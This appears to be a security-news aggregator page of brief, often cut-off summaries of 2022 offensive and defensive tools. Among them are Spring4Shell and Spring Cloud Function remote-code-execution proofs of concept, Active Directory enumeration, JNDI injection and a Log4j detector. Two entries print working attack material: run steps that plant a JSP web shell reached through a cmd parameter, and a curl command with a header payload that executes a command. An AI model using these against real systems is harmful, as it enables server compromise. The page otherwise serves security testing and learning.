Spring4Shell-Poc – Spring Core RCE 0-day Vulnerability

Description of the vulnerability: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Construction of the POC: https://github.com/BobTheShoplifter/Spring4Shell-POC

Steps to Build/Run
Tested with JDK 11.0.14, Spring Boot 2.6.5, and Apache Tomcat 9.0.60.
Run mvn clean package to build the application.
Rename demo-0.0.1-SNAPSHOT.war to spring-poc.war and copy this .war file to Tomcat's webapps directory.
Run python exp.py --url http://localhost:8080/spring-poc/greeting
If successful, the message 漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoami (Chinese: "the vulnerability exists, the shell address is: ...")

linWinPwn – A Bash Script That Automates A Number Of Active Directory Enumeration And Vulnerability Checks

linWinPwn is a bash script that automates a number of Active Directory enumeration and vulnerability checks. The script leverages and depends on a number of tools, including: impacket, bloodhound, crackmapexec, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump.

Setup
Git clone the repository and make the script executable:
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
Install Linux

CVE-2022-22963 – PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable Spring Boot application, run this Docker container, exposing it on port 8080. Example:
docker run -it -d -p 8080:8080 bobcheat/springboot-public

Exploit
Curl command:
curl -i -s -k -X $'POST' -H $'Host:' -H $'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("touch /tmp/test")' --data-binary $'exploit_poc' $''

Or using Burp Suite:

Credits: https://github.com/hktalent/spring-spel-0day-poc

CVE-2022-27254 – PoC For Vulnerability In Honda’s Remote Keyless System

PoC for vulnerability in Honda's Remote Keyless System (CVE-2022-27254). Disclaimer: For educational purposes only. Kindly note that the discoverers of this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth, and HackingIntoYourHeart. Others mentioned in this repository are credited for the support that they have provided but have played no active role in any research conducted

Request_Smuggler – Http Request Smuggling Vulnerability Scanner

Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to HTTP request smuggling.

Usage
USAGE:
    request_smuggler [OPTIONS] --url <url>
FLAGS:
    -h, --help       Prints help information
    -V, --version    Prints version information
OPTIONS:
    --amount-of-payloads <amount-of-payloads>    low/medium/all [default: low]
    -t, --attack-types <attack-types>            [ClTeMethod, ClTePath, ClTeTime, TeClMethod, TeClPath, TeClTime] [default: "ClTeTime"

WSVuls – Website Vulnerability Scanner Detect Issues (Outdated Server Software And Insecure HTTP Headers)

WSVuls: website vulnerability scanner that detects issues (outdated server software and insecure HTTP headers).

What's WSVuls?
WSVuls is a simple and powerful command line tool for Linux, Windows and macOS. It's designed for developers/testers and for IT workers who want to test for vulnerabilities and analyse websites from a single command. It detects issues

JNDI-Injection-Exploit – A Tool Which Generates JNDI Links Can Start Several Servers To Exploit JNDI Injection Vulnerability

JNDI-Injection-Exploit is a tool for generating workable JNDI links and providing background services by starting an RMI server, an LDAP server and an HTTP server. The RMI server and LDAP server are based on marshals and modified further to link with the HTTP server. Using this tool allows you to get JNDI links; you can insert these links into your POC to

VulnLab – A Web Vulnerability Lab Project

VulnLab
A web vulnerability lab project developed by Yavuzlar.

Vulnerabilities
SQL Injection
Cross Site Scripting (XSS)
Command Injection
Insecure Direct Object References (IDOR)
Cross Site Request Forgery (CSRF)
XML External Entity (XXE)
Insecure Deserialization
File Upload
File Inclusion
Broken Authentication

Installation
Install with DockerHub
If you want to install from DockerHub, just type this command.

Wireshark-Forensics-Plugin – A cross-platform Wireshark plugin that correlates network traffic data with threat intelligence, asset categorization & vulnerability data

Wireshark is the most widely used network traffic analyzer. It is an important tool for both live traffic analysis and forensic analysis for forensic/malware analysts. Even though Wireshark provides incredibly powerful functionality for protocol parsing and filtering, it does not provide any contextual information about network endpoints. For a typical analyst, who has to comb

Log4J-Detect – Script To Detect The "Log4j" Java Library Vulnerability (CVE-2021-44228) For A List Of URLs With Multithreading

Simple Python 3 script to detect the "Log4j" Java library vulnerability (CVE-2021-44228) for a list of URLs with multithreading. The script "log4j-detect.py", developed in Python 3, is responsible for detecting whether a list of URLs is vulnerable to CVE-2021-44228. To do so, it sends a GET request using threads (for higher performance) to each of the